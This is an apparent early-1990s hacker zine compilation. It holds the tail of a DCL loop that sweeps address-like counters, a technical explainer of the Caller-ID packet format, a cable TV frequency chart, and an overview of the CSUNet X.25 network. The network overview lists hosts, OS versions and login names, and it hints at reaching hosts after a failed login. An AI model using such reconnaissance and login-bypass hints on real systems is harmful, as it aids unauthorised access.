$ IF D .EQ. 256 THEN GOTO LOOP2
|
|||
|
$ IF C .EQ. 256 THEN GOTO LOOP3
|
|||
|
$ IF B .EQ. 256 THEN GOTO LOOP4
|
|||
|
$ GOTO LOOP1
|
|||
|
$ LOOP2:
|
|||
|
$ D = 0
|
|||
|
$ C = C + 1
|
|||
|
$ GOTO LOOP1
|
|||
|
$ LOOP3:
|
|||
|
$ C = 0
|
|||
|
$ B = B + 1
|
|||
|
$ GOTO LOOP1
|
|||
|
$ LOOP4:
|
|||
|
$ B = 0
|
|||
|
$ A = A + 1
|
|||
|
$ GOTO LOOP1
|
|||
|
$ EXIT
|
|||
|
*------------------------------------CUT HERE----------------------------------*
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
Caller Identification
|
|||
|
by (Loq)ue & Key
|
|||
|
3/20/93
|
|||
|
|
|||
|
|
|||
|
Caller-Identification (CID), is a relatively new service being
|
|||
|
offered by several carriers. It is part of a total revamp of the
|
|||
|
telephone network, with the telephone companies trying to get people
|
|||
|
to spend more money on their systems. CID is just one of the newer
|
|||
|
CLASS services, which will eventually lead into ISDN in all areas.
|
|||
|
|
|||
|
Caller-ID allows a receiving party to see the number that is
|
|||
|
calling before they pick up the phone. It can be used for everything
|
|||
|
from pizza delivery to stopping prank callers. One scenario
|
|||
|
made possible from CID is one where a salesman dials your number,
|
|||
|
you look on a little box and see that it is someone you don't want
|
|||
|
to talk to, so you promptly pick up the phone, say "Sorry, I don't
|
|||
|
want any *** *** products" and slam down the receiver. Ah, the
|
|||
|
wonders of modern technology.
|
|||
|
|
|||
|
Caller-ID starts by a person making a call. When the person
|
|||
|
dials a number, the local switch rings the calling number once, and
|
|||
|
then sends a specially encoded packet to the number, after checking
|
|||
|
to see if that caller has access to the Calling Number Delivery
|
|||
|
service.
|
|||
|
|
|||
|
The packet can contain any information, but currently it holds
|
|||
|
a data stream that contains flow control, and error checking data.
|
|||
|
The specifications state that several signals can exist, however,
|
|||
|
only the Caller-ID signal is used currently.
|
|||
|
|
|||
|
The CID packet begins with a "Channel Seizure Signal". The
|
|||
|
CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to
|
|||
|
250 milliseconds of a 600 hz square wave.
|
|||
|
|
|||
|
The second signal is the "Carrier Signal," which lasts for 150
|
|||
|
milliseconds, and contains all binary 1's. The receiving equipment
|
|||
|
should have been "woken-up" by the previous signal and should now
|
|||
|
be waiting for the important information to come across.
|
|||
|
|
|||
|
Next are the "Message Type Word", and the "Message Length Word".
|
|||
|
The MTW contains a Hex $04 for CID applications, with several other
|
|||
|
codes being planned, for example $0A to mean message waiting for
|
|||
|
a pager. The MLW contains the binary equivalent of the number of
|
|||
|
digits in the calling number.
|
|||
|
|
|||
|
The data words come next, in ASCII, with the least significant
|
|||
|
digit first. It is padded in from with a binary 0, and followed by
|
|||
|
a binary 1. A checksum word comes after that, which contains the
|
|||
|
twos-complement sum of the MLW and data words.
|
|||
|
|
|||
|
The checksum word usually signals the end of the message from
|
|||
|
the CO, however, other messages for equipment to decode can occur
|
|||
|
afterwards.
|
|||
|
|
|||
|
Caller-ID can usually be disabled with a 3 digit sequence,
|
|||
|
which can vary from CO to CO. Several of these have been mentioned
|
|||
|
in the past on Usenet, in comp.dcom.telecom.
|
|||
|
|
|||
|
Caller-ID chips are available from many sources, however,
|
|||
|
remember that you must connect these chips through an FCC-approved
|
|||
|
Part-68 Interface. Several of these interfaces are available,
|
|||
|
however they are fairly expensive for an amateur electronics hacker.
|
|||
|
|
|||
|
If you have any more questions on CID, mail me at the above
|
|||
|
address, or post to comp.dcom.telecom.
|
|||
|
|
|||
|
Additional Sources from Bellcore:
|
|||
|
|
|||
|
Nynex Catalog of Technical Information #NIP-7400
|
|||
|
SPCS Customer Premises Equipment Data Interface #TR-TSY-0030
|
|||
|
CLASS Feature: Calling Number Delivery #FSD-02-1051
|
|||
|
CLASS Feature: Calling Number Blocking #TR-TSY-000391
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
THE "OFFICIAL" CABLE TELEVISION VIDEO FREQUENCY SPECTRUM CHART
|
|||
|
COURTESY OF: JOE (WA1VIA) & JIM (WA1FTA)
|
|||
|
|
|||
|
CATV CHANNEL FREQUENCY (MHz) CATV CHANNEL FREQUENCY (MHz)
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
2 2 55.25 37 AA 301.25
|
|||
|
3 3 61.25 38 BB 307.25
|
|||
|
4 4 67.25 39 CC 313.25
|
|||
|
5 5 77.25 40 DD 319.25
|
|||
|
6 6 83.25 (85.25 ICC) 41 EE 325.25
|
|||
|
--------------------------------------- 42 FF 331.25
|
|||
|
7 7 175.25 43 GG 337.25
|
|||
|
8 8 181.25 44 HH 343.25
|
|||
|
9 9 187.25 45 II 349.25
|
|||
|
10 10 193.25 46 JJ 355.25
|
|||
|
11 11 199.25 47 KK 361.25
|
|||
|
12 12 205.25 48 LL 367.25
|
|||
|
13 13 211.25 49 MM 373.25
|
|||
|
--------------------------------------- 50 NN 379.25
|
|||
|
14 A 121.25 51 OO 385.25
|
|||
|
15 B 127.25 52 PP 391.25
|
|||
|
16 C 133.25 53 QQ 397.25
|
|||
|
17 D 139.25 54 RR 403.25
|
|||
|
18 E 145.25 55 SS 409.25
|
|||
|
19 F 151.25 56 TT 415.25
|
|||
|
20 G 157.25 57 UU 421.25
|
|||
|
21 H 163.25 58 VV 427.25
|
|||
|
22 I 169.25 59 WW 433.25
|
|||
|
---------------------------------------- 60 W+ 439.25
|
|||
|
23 J 217.25 ---------------------------------
|
|||
|
24 K 223.25 61 W+1 445.25
|
|||
|
25 L 229.25 62 W+2 451.25
|
|||
|
26 M 235.25 63 W+3 457.25
|
|||
|
27 N 241.25 64 W+4 463.25
|
|||
|
28 O 247.25 65 W+5 469.25
|
|||
|
29 P 253.25 ---------------------------------
|
|||
|
30 Q 259.25 66 A-1 115.25
|
|||
|
31 R 265.25 67 A-2 109.25
|
|||
|
32 S 271.25 68 A-3 103.25
|
|||
|
33 T 277.25 69 A-4 97.25
|
|||
|
34 U 283.25 70 A-5 91.25
|
|||
|
35 V 289.25 ---------------------------------
|
|||
|
36 W 295.25 01 A-8 73.25
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
* This chart was created 08/19/89 by: WA1VIA & WA1FTA. Some uses include the
|
|||
|
isolation of CATV interference to other radio services, and building of active
|
|||
|
& passive filters, and descramblers. This does NOT give you the right to view
|
|||
|
or decode premium cable channels; without proper authorization from your local
|
|||
|
cable TV company. Federal and various state laws provide for substantial civil
|
|||
|
an criminal penalties for unauthorized use.
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
******************************************************************************
|
|||
|
|
|||
|
-----------------------------
|
|||
|
The CSUNet X.25 Network
|
|||
|
Overview by Belgorath
|
|||
|
-----------------------------
|
|||
|
C y b e r C o r p s
|
|||
|
|
|||
|
Calstate University, along with Humboldt State, runs a small X.25 network
|
|||
|
interconnecting its campuses. This file will attempt to give an overview of
|
|||
|
this network. The hosts on this network are connected via 9600-baud links. The
|
|||
|
main PAD on this network is a PCI/01 that allows the user to connect to several
|
|||
|
hosts. Among them are:
|
|||
|
|
|||
|
(At the time of this writing, several of the machines were unreachable. They
|
|||
|
are marked with "No info available")
|
|||
|
|
|||
|
hum - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
|
|||
|
swrl - A CalState CDC Cyber named "Swirl", running CDCNet. You may use
|
|||
|
CDCNet to connect to the following hosts:
|
|||
|
ATL (SunOS, eis.calstate.edu), login as:
|
|||
|
access to request an account
|
|||
|
ctp to access CTP
|
|||
|
CCS CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
|
|||
|
COC CDC Cyber 960-31 (NOS 2.7.1)
|
|||
|
FILLY VAX 6230 (VMS 5.3)
|
|||
|
ICEP IBM 4381 (VM)
|
|||
|
OX IBM 4381 (MVS) (Aptly Named)
|
|||
|
mlvl - University of California's Library Catalog System, named
|
|||
|
"Melvyl".
|
|||
|
sb - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
|
|||
|
sd - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
|
|||
|
chi - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough
|
|||
|
this system is running CDCNet with itself as the only host
|
|||
|
bak - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1)
|
|||
|
this system is running CDCNet, and if you fail the login, you
|
|||
|
can connect to these systems, if you type fast enough:
|
|||
|
CCS - Central Cyber 960 System
|
|||
|
CSBINA - CSUB Instructional Vax 3900
|
|||
|
CSBOAA - CSUB Office Automation Vax 4300
|
|||
|
CYBER - Local host
|
|||
|
RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
|
|||
|
ccs - CDC Cyber 960-31 (CCS from Swirl)
|
|||
|
coc - CDC Cyber 960-31 (COC from Swirl)
|
|||
|
dh - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) -
|
|||
|
this system runs CDCNet with no hosts.. go figure
|
|||
|
fre - Calstate/Fresno - No info available
|
|||
|
ful - Calstate/Fullerton - No info available
|
|||
|
hay - Calstate/Hayward - No info available
|
|||
|
la - Calstate/Los Angeles - No info available
|
|||
|
lb - Calstate/Long Beach - No info available
|
|||
|
mv - No info available
|
|||
|
news - No info available
|
|||
|
nor - Calstate/Northridge - No info available
|
|||
|
pom - California State Polytechnic University, Pomona - No info available
|
|||
|
sac - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
|
|||
|
sf - Calstate/San Francisco - No info available
|
|||
|
sj - San Jose State University - No info available
|
|||
|
son - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this
|
|||
|
system runs CDCNet with itself as the only host
|
|||
|
sm - No info available
|
|||
|
slo - California State Polytechnic University, San Luis Obispo - No info
|
|||
|
available
|
|||
|
sta - Calstate/Stanislaus - No info available
|
|||
|
ven - No info available
|
|||
|
carl - No info available
|
|||
|
|
|||
|
caps - CSUNet networking machine. From it, you can connecting to most
|
|||
|
PAD hosts plus a few more. The extras are:
|
|||
|
access - Connect to eis.calstate.edu (login as "access")
|
|||
|
core - Connect to eis.calstate.edu (login as "core")
|
|||
|
ctp - Connect to eis.calstate.edu (login as "ctp")
|
|||
|
eis - Connect to eis.calstate.edu (login as "eis")
|
|||
|
trie - Connect to eis.calstate.edu (login as "trie")
|
|||
|
csupernet - CSUPERNet appears to be a public-access UNIX.
|
|||
|
login as "public" for ATI-Net.
|
|||
|
login as "super" for academic information.
|
|||
|
login as "atls" for the ATLS system
|
|||
|
Once you apply for an account here, you can telnet
|
|||
|
to caticsuf.cati.csufresno.edu to use it.
|
|||
|
|
|||
|
This is all well and good, but how to you access CSUNet? It can be reached
|
|||
|
via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
|
|||
|
allows several services, among them are:
|
|||
|
|
|||
|
X25 - Connect directly to CSUNet PAD
|
|||
|
960 - CDC Cyber 180/830 (Swirl)
|
|||
|
830 - CDC Cyber 180/830 (COC from Swirl)
|
|||
|
VAX - VAX 8700 (VMS V5.3)
|
|||
|
70 - DEC PDP 11/70 (running RSTS)
|
|||
|
SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
|
|||
|
TELNET - Telnet Server
|
|||
|
|
|||
|
That's really all there is to say concerning the network structure (well,
|
|||
|
I could go through and list all their X.25 addresses, but I won't). There's a
|
|||
|
ton more to be said about using this network, but its little quirks and
|
|||
|
surprises can be left to you to figure out. What I can do here is give a few
|
|||
|
hints on using CDCNet and the PAD.
|
|||
|
|
|||
|
Using the PAD
|
|||
|
~~~~~~~~~~~~~
|
|||
|
Once you're at the X.25 PAD, you'll get a message like:
|
|||
|
CSUnet Humboldt PCI/01, Port: P17
|
|||
|
At the "Pad>" prompt, simply type the hostname to connect to. When in
|
|||
|
doubt, type "help <subjectname>", or just "help" for a list of subjects that
|
|||
|
help is available on.
|
|||
|
|
|||
|
Using CDCNet
|
|||
|
~~~~~~~~~~~~
|
|||
|
When a CDC Cyber says "You may now execute CDCNet Commands", this is your
|
|||
|
cue. You have the following commands available:
|
|||
|
|
|||
|
activate_auto_recognition
|
|||
|
activate_x_personal_computer
|
|||
|
change_connection_attribute
|
|||
|
change_terminal_attribute
|
|||
|
change_working_connection
|
|||
|
create_connection
|
|||
|
delete_connection
|
|||
|
display_command_information
|
|||
|
display_command_list
|
|||
|
display_connection
|
|||
|
display_connection_attribute
|
|||
|
display_service
|
|||
|
display_terminal_attribute
|
|||
|
do
|
|||
|
help
|
|||
|
request_network_operator
|
|||
|
|
|||
|
The ones to concern yourself with are display_service, create_connection,
|
|||
|
and help. "help" gives the above command listing (useful), "display_service"
|
|||
|
lists the hosts on the current CDCNet, and "create_connection <host>" creates a
|
|||
|
connection to "host" on the CDCNet.
|
|||
|
|
|||
|
*******************************************************************************
|
|||
|
|
|||
|
|
|||
|
|